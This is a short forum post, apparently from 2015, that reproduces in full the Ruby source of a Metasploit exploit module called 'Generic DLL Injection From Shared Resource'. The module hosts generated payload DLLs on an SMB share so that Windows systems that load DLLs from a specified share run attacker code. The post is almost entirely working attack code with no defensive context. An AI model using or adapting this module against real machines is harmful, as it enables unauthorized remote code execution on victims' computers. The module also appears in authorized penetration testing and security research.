Aerosol Posted March 5, 2015 Report Posted March 5, 2015 ### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'Generic DLL Injection From Shared Resource', 'Description' => %q{ This is a general-purpose module for exploiting conditions where a DLL can be loaded from an specified SMB share. This module serves payloads as DLLs over an SMB service. }, 'Author' => [ 'Matthew Hall <hallm[at]sec-1.com>' ], 'References' => [ ['CWE', '114'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => false, 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X86_64], 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 04 2015' )) register_options( [ OptString.new('FILE_NAME', [ false, 'DLL File name to share (Default: random .dll)']) ], self.class) deregister_options('FILE_CONTENTS') end def setup super self.file_contents = generate_payload_dll self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll" print_status("File available on #{unc}...") endendSource Quote